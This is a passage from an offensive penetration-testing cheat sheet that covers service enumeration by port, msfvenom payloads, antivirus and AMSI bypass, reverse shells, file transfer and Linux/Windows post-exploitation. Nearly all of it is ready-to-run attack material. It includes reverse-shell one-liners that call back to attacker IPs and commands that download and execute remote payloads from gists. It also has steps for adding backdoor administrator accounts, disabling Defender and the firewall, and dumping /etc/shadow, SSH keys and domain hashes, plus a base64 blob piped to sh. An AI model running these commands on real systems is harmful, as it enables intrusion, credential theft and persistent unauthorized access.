 auxiliary/scanner/snmp/arris_dg950                                   
 auxiliary/scanner/snmp/brocade_enumhash                               
 auxiliary/scanner/snmp/cisco_config_tftp                               
 auxiliary/scanner/snmp/cisco_upload_file                              
 auxiliary/scanner/snmp/cnpilot_r_snmp_loot                             
 auxiliary/scanner/snmp/epmp1000_snmp_loot                             
 auxiliary/scanner/snmp/netopia_enum                                    
 auxiliary/scanner/snmp/sbg6580_enum                                 
 auxiliary/scanner/snmp/snmp_enum                                 
 auxiliary/scanner/snmp/snmp_enum_hp_laserjet                           
 auxiliary/scanner/snmp/snmp_enumshares                                
 auxiliary/scanner/snmp/snmp_enumusers                                 
 auxiliary/scanner/snmp/snmp_login

Port 389,636 - LDAP

Check AD section and this LDAP guide

jxplorer
ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"
python3 windapsearch.py --dc-ip 10.10.10.182 --users --full > windapsearch_users.txt
cat windapsearch_users.txt | grep sAMAccountName | cut -d " " -f 2 > users.txt
# Check # https://github.com/ropnop/go-windapsearch

Port 443 - HTTPS

Read the actual SSL CERT to:

• find out potential correct vhost to GET
• is the clock skewed
• any names that could be usernames for bruteforce/guessing.

./testssl.sh -e -E -f -p  -S -P -c -H -U TARGET-HOST > OUTPUT-FILE.html
# Check for mod_ssl,OpenSSL version Openfuck

Port 500 - ISAKMP IKE

ike-scan 10.11.1.111

Port 513 - Rlogin

apt install rsh-client
rlogin -l root 10.11.1.111

Port 541 - FortiNet SSLVPN

Fortinet Ports Guide

SSL VPN Leak

Port 1433 - MSSQL

nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111
use auxiliary/scanner/mssql/mssql_ping
use auxiliary/scanner/mssql/mssql_login
use exploit/windows/mssql/mssql_payload
sqsh -S 10.11.1.111 -U sa
    xp_cmdshell 'date'
      go


EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami")'

https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

Port 1521 - Oracle

oscanner -s 10.11.1.111 -P 1521
tnscmd10g version -h 10.11.1.111
tnscmd10g status -h 10.11.1.111
nmap -p 1521 -A 10.11.1.111
nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute
MSF: good modules under auxiliary/admin/oracle and scanner/oracle

# https://github.com/quentinhardy/odat
./odat-libc2.5-i686 all -s 10.11.1.111 -p 1521
./odat-libc2.5-i686 sidguesser -s 10.11.1.111 -p 1521
./odat-libc2.5-i686 passwordguesser -s 10.11.1.111 -p 1521 -d XE

# Upload reverse shell with ODAT:
./odat-libc2.5-i686 utlfile -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe /root/shell.exe

# and run it:
./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe

Port 2000 - Cisco sccp

# cisco-audit-tool
CAT -h ip -p 2000 -w /usr/share/wordlists/rockyou.txt 

# cisco-smart-install
https://github.com/Sab0tag3d/SIET/
sudo python siet.py -g -i 192.168.0.1

Port 2049 - NFS

nmap -p 111,2049 --script nfs-ls,nfs-showmount

showmount -e 10.11.1.111

# If you find anything you can mount it like this:

mount 10.11.1.111:/ /tmp/NFS –o nolock
mount -t nfs 10.11.1.111:/ /tmp/NFS –o nolock

Port 2100 - Oracle XML DB

Default passwords:

https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm

Port 3306 - MySQL

nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306

mysql --host=10.11.1.111 -u root -p

# MYSQL UDF 4.x/5.0
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/

Port 3389 - RDP

nmap -p 3389 --script=rdp-vuln-ms12-020.nse
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.11.1.111
rdesktop -u guest -p guest 10.11.1.111 -g 94%
ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://10.11.1.111
python crowbar.py -b rdp -s 10.11.1.111/32 -u admin -C ../rockyou.txt -v

Port 5432 - PostgreSQL

psql -h 10.10.1.111 -U postgres -W

# Default creds
postgres : postgres
postgres : password
postgres : admin
admin : admin
admin : password

pg_dump --host=10.10.1.111 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump

Port 5900 - VNC

nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111

Port 5984 - CouchDB

curl http://example.com:5984/
curl -X GET http://IP:5984/_all_dbs
curl -X GET http://user:password@IP:5984/_all_dbs

# CVE-2017-12635 RCE

# Create user
curl -X PUT ‘http://localhost:5984/_users/org.couchdb.user:chenny' — data-binary ‘{ “type”: “user”, “name”: “chenny”, “roles”: [“_admin”], “roles”: [], “password”: “password” }’

# Dump database
curl http://127.0.0.1:5984/passwords/_all_docs?include_docs=true -u chenny:-Xpassword <ds/_all_docs?include_docs=true -u chenny:-Xpassword

# Dump passwords
curl -X GET http://user:passwords@localhost:5984/passwords

Port 5985 - WinRM

# https://github.com/Hackplayers/evil-winrm
gem install evil-winrm
evil-winrm -i 10.11.1.111 -u Administrator -p 'password1'
evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder

Port 6379 - Redis

# https://github.com/Avinash-acid/Redis-Server-Exploit
python redis.py 10.10.10.160 redis

Port 8172 - MsDeploy

# Microsoft IIS Deploy port
IP:8172/msdeploy.axd

Port 5601/9200

ELK

Port 27017-19/27080/28017 - MongoDB

MongoDB

Unknown ports

• amap -d 10.11.1.111 8000
• netcat: makes connections to ports. Can echo strings or give shells: nc -nv 10.11.1.111 110
• sfuzz: can connect to ports, udp or tcp, refrain from closing a connection, using basic HTTP configurations

RCE ports

description: Accessing to the victim's system

Exploitation

• Payloads
• Reverse shells
• File transfer

Payloads

msfvenom

# Creating a payload
msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]

# List of payloads
msfvenom -l payloads

# Payload options
msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options

# Creating a payload with encoding
msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration]  > outputfile

# Creating a payload using a template
msfvenom -p [payload]  -x [template] -f [formattype] > outputfile

# Listener for MSfvenom Payloads:
msf5>use exploit/multi/handler  
msf5>set payload windows/meterpreter/reverse_tcp  
msf5>set lhost   
msf5>set lport   
msf5> set ExitOnSession false  
msf5>exploit -j  

#  Windows Payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe    
msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe    
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe    
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe    
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

#  Linux Payloads
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf    
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf    
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf    
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf

# Add a user in windows with msfvenom: 
msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe

#  Web Payloads

# PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php

# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

#  Scripting Payloads

# Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

# Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

# Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

# Creating an Msfvenom Payload with an encoder while removing bad charecters:
msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"

https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/

Bypass AV

# Veil Framework:
https://github.com/Veil-Framework/Veil

# Shellter
https://www.shellterproject.com/download/

# Sharpshooter
# https://github.com/mdsecactivebreach/SharpShooter
# Javascript Payload Stageless: 
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

# Stageless HTA Payload: 
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

# Staged VBS:
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

# Donut: 
https://github.com/TheWover/donut

# Vulcan
https://github.com/praetorian-code/vulcan

Bypass Amsi

# Testing for Amsi Bypass:
https://github.com/rasta-mouse/AmsiScanBufferBypass

# Amsi-Bypass-Powershell
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

https://blog.f-secure.com/hunting-for-amsi-bypasses/
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
https://slaeryan.github.io/posts/falcon-zero-alpha.html

Reverse shells

**Tools** 
https://github.com/ShutdownRepo/shellerator
https://github.com/0x00-0x00/ShellPop

Linux

# Bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f
nc -e /bin/sh 10.11.1.111 4443
bash -i >& /dev/tcp/IP ADDRESS/8080 0>&1

# Perl
perl -e 'use Socket;$i="IP ADDRESS";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c '__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4433 >/tmp/f')-1\'

# Python IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 

# Ruby
ruby -rsocket -e'f=TCPSocket.open("IP ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

# PHP:
# /usr/share/webshells/php/php-reverse-shell.php
# http://pentestmonkey.net/tools/web-shells/php-reverse-shell
php -r '$sock=fsockopen("IP ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
$sock, 1=>$sock, 2=>$sock), $pipes);?>

# Golang
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP ADDRESS:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

# AWK
awk 'BEGIN {s = "/inet/tcp/0/IP ADDRESS/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

Windows

# Netcat
nc -e cmd.exe 10.11.1.111 4443

# Powershell
$callback = New-Object System.Net.Sockets.TCPClient("IP ADDRESS",53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$callback.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# Undetectable:
# https://0xdarkvortex.dev/index.php/2018/09/04/malware-on-steroids-part-1-simple-cmd-reverse-shell/
i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

# Undetectable 2:
# https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
# 64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
# 32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

Tips

#  rlwrap
# https://linux.die.net/man/1/rlwrap
# Connect to a netcat client:
rlwrap nc [IP Address] [port]
# Connect to a netcat Listener:
rlwrap nc -lvp [Localport]

# Linux Backdoor Shells: 
rlwrap nc [Your IP Address] -e /bin/sh 
rlwrap nc [Your IP Address] -e /bin/bash
rlwrap nc [Your IP Address] -e /bin/zsh
rlwrap nc [Your IP Address] -e /bin/ash

# Windows Backdoor Shell: 
rlwrap nc -lv [localport] -e cmd.exe

File tranfer

Linux

# Web Server
# https://github.com/sc0tfree/updog
pip3 install updog
updog 
updog -d /another/directory
updog -p 1234
updog --password examplePassword123!
updog --ssl

# Python web server
python -m SimpleHTTPServer 8080

# FTP Server
# Install pyftpdlib
pip install pyftpdlib
# Run (-w flag allows anonymous write access)
python -m pyftpdlib -p 21 -w
# In victim: 
curl -T out.txt ftp://10.10.15.229

# TFTP Server
# In Kali
atftpd --daemon --port 69 /tftp
# In reverse Windows
tftp -i 10.11.1.111 GET nc.exe
nc.exe -e cmd.exe 10.11.1.111 4444
# Example:
http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=nc.exe%20-e%20cmd.exe%2010.11.0.105%204444

Windows

# Bitsadmin
bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe

# certutil
certutil.exe -urlcache -split -f "http://10.11.1.111/Powerless.bat" Powerless.bat

# Powershell
(New-Object System.Net.WebClient).DownloadFile("http://10.11.1.111/CLSID.list","C:\Users\Public\CLSID.list")

# FTP
# In reverse shell" 
echo open 10.11.1.111 > ftp.txt)
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt 
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt
# Execute
ftp -v -n -s:ftp.txt

# SMB Server
# Attack machine
python /usr/share/doc/python-impacket/examples/smbserver.py Lab "/root/labs/public/10.11.1.111" -u usuario -p pass
python /usr/share/doc/python3-impacket/examples/smbserver.py Lab "/root/htb/169-resolute/smb"

# Or SMB service 
# http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html
    vim /etc/samba/smb.conf
        [global]
        workgroup = WORKGROUP
        server string = Samba Server %v
        netbios name = indishell-lab
        security = user
        map to guest = bad user
        name resolve order = bcast host
        dns proxy = no
        bind interfaces only = yes

        [ica]
        path = /var/www/html/pub
        writable = no
        guest ok = yes
        guest only = yes
        read only = yes
        directory mode = 0555
        force user = nobody

    chmod -R 777 smb_path
    chown -R nobody:nobody smb_path
    service smbd restart 

# Victim machine with reverse shell
# Download: copy \\10.11.1.111\Lab\wce.exe . 
# Upload: copy wtf.jpg \\10.11.1.111\Lab

# VBScript
# In reverse shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
# Execute
cscript wget.vbs http://10.11.1.111/file.exe file.exe

description: 'Privesc, lateral movements, looting...'

Post-exploitation

• Linux
• Windows
• Looting

Linux

**Tools** 
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
https://github.com/mbahadou/postenum/blob/master/postenum.sh
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64)

https://gtfobins.github.io/

# Spawning shell
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within vi)
:!bash
:set shell=/bin/bash:shell
(From within nmap)
!sh

# Access to more binaries
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Download files from attacker
wget http://10.11.1.111:8080/ -r; mv 10.11.1.111:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linpeas.sh postenum.sh pspy32 pspy64

# Enum scripts
./LinEnum.sh -t -k password -r LinEnum.txt
./postenum.sh
./linpeas.sh
./pspy

# Common writable directories
/tmp
/var/tmp
/dev/shm

# Add user to sudoers
useradd hacker
passwd hacker
echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers

# sudo permissions
sudo -l -l

# Journalctl
If you can run as root, run in small window and !/bin/sh

# Crons
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
cat /etc/frontal
cat /etc/anacron
systemctl list-timers --all

# Common info
uname -a
env
id
cat /proc/version
cat /etc/issue
cat /etc/passwd
cat /etc/group
cat /etc/shadow
cat /etc/hosts

# Users with login
grep -vE "nologin" /etc/passwd

# Network info
cat /proc/net/arp
cat /proc/net/fib_trie

# Filter out lines containing "0.0.0.0" or "127." from the fib_trie output
cat /proc/net/fib_trie | grep "|--" | egrep -v "0.0.0.0|127."

# Extracting IP addresses from /proc/net/tcp and printing them
awk '
function hextodec(str) {
    ret = 0
    for (i=1; i<=length(str); i++) {
        ret = ret * 16 + (index("0123456789abcdef", tolower(substr(str, i, 1))) - 1)
    }
    return ret
}
function getIP(str) {
    ret = ""
    for (i = 1; i <= 8; i += 2) {
        ret = hextodec(substr(str, i, 2)) "." ret
    }
    ret = substr(ret, 1, length(ret) - 1)
    ret = ret ":" hextodec(substr(str, 10, 4))
    return ret
}
NR > 1 {
    if (NR == 2) print "Local - Remote"
    local = getIP($2)
    remote = getIP($3)
    print local " - " remote
}' /proc/net/tcp


# Netstat without netstat 2
echo "YXdrICdmdW5jdGlvbiBoZXh0b2RlYyhzdHIscmV0LG4saSxrLGMpewogICAgcmV0ID0gMAogICAgbiA9IGxlbmd0aChzdHIpCiAgICBmb3IgKGkgPSAxOyBpIDw9IG47IGkrKykgewogICAgICAgIGMgPSB0b2xvd2VyKHN1YnN0cihzdHIsIGksIDEpKQogICAgICAgIGsgPSBpbmRleCgiMTIzNDU2Nzg5YWJjZGVmIiwgYykKICAgICAgICByZXQgPSByZXQgKiAxNiArIGsKICAgIH0KICAgIHJldHVybiByZXQKfQpmdW5jdGlvbiBnZXRJUChzdHIscmV0KXsKICAgIHJldD1oZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpLTIsMikpOyAKICAgIGZvciAoaT01OyBpPjA7IGktPTIpIHsKICAgICAgICByZXQgPSByZXQiLiJoZXh0b2RlYyhzdWJzdHIoc3RyLGksMikpCiAgICB9CiAgICByZXQgPSByZXQiOiJoZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpKzEsNCkpCiAgICByZXR1cm4gcmV0Cn0gCk5SID4gMSB7e2lmKE5SPT0yKXByaW50ICJMb2NhbCAtIFJlbW90ZSI7bG9jYWw9Z2V0SVAoJDIpO3JlbW90ZT1nZXRJUCgkMyl9e3ByaW50IGxvY2FsIiAtICJyZW1vdGV9fScgL3Byb2MvbmV0L3RjcCAKqtc" | base64 -d | sh

# Nmap without nmap
for ip in {1..5}; do for port in {21,22,5000,8000,3306}; do (echo >/dev/tcp/172.18.0.$ip/$port) >& /dev/null && echo "172.18.0.$ip port $port is open"; done; done

# Open ports without netstat
grep -v "rem_address" /proc/net/tcp | awk  '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'

# Check ssh files:
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

# SUID
find / -perm -4000 -type f 2>/dev/null
# ALL PERMS
find / -perm -777 -type f 2>/dev/null
# SUID for current user
find / perm /u=s -user `whoami` 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
# Writables for current user/group
find / perm /u=w -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null
find / -perm /u+w -user `whoami` 2>/dev/nul
# Dirs with +w perms for current u/g
find / perm /u=w -type -d -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null

# Port Forwarding
# Chisel
# Victim server:
chisel server --auth "test:123" -p 443 --reverse
# In host attacker machine:
./chisel client --auth "test:123" 10.10.10.10:443 R:socks

# Dynamic Port Forwarding:
# Attacker machine:
ssh -D 9050 user@host
# Attacker machine Burp Proxy - SOCKS Proxy:
Mark “Override User Options”
Mark Use Socks Proxy:
SOCKS host:127.0.0.1
SOCKS port:9050

# Tunneling 
Target must have SSH running for there service
1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p 
2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
3. Add the following line into the config: Socks5 127.0.0.1 
4. Run commands through the tunnel: proxychains 

# SShuttle
# https://github.com/sshuttle/sshuttle
sshuttle -r root@172.21.0.0 10.2.2.0/24

# netsh port forwarding
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000

Windows

**Tools** 
https://github.com/S3cur3Th1sSh1t/WinPwn
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASbat/winPEAS.bat
https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/privesc/PowerUp.ps1
https://github.com/S3cur3Th1sSh1t/PowerSharpPack 

https://lolbas-project.github.io/#

# Basic info
systeminfo
set
hostname
net users
net user user1
net localgroups
accesschk.exe -uwcqv "Authenticated Users" *
netsh firewall show state
netsh firewall show config
whoami /priv

# Set path
set PATH=%PATH%;C:\xampp\php

dir /a -> Show hidden & unhidden files
dir /Q -> Show permissions

# check .net version:
gci 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | gp -name Version -EA 0 | where { $_.PSChildName -match '^(?!S)\p{L}'} | select PSChildName, Version
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Users Path"

# Passwords
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
python secretsdump.py -just-dc-ntlm htb.hostname/username@10.10.1.10 
secretsdump.py -just-dc htb.hostname/username@10.10.1.10 > dump.txt

# Add RDP user and disable firewall
net user haxxor Haxxor123 /add
net localgroup Administrators haxxor /add
net localgroup "Remote Desktop Users" haxxor /ADD
# Turn firewall off and enable RDP
sc stop WinDefend
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

# Dump Firefox data
# Looking for Firefox
Get-Process
./procdump64.exe -ma $PID-FF
Select-String -Path .\*.dmp -Pattern 'password' > 1.txt
type 1.txt | findstr /s /i "admin"

# PS Bypass Policy 
Set-ExecutionPolicy Unrestricted
powershell.exe -exec bypass
Set-ExecutionPolicy-ExecutionPolicyBypass -Scope Procesy

# Convert passwords to secure strings and output to an XML file:
$secpasswd = ConvertTo-SecureString "VMware1!" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("administrator", $secpasswd) 
$mycreds | export-clixml -path c:\temp\password.xml

# PS sudo
$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'
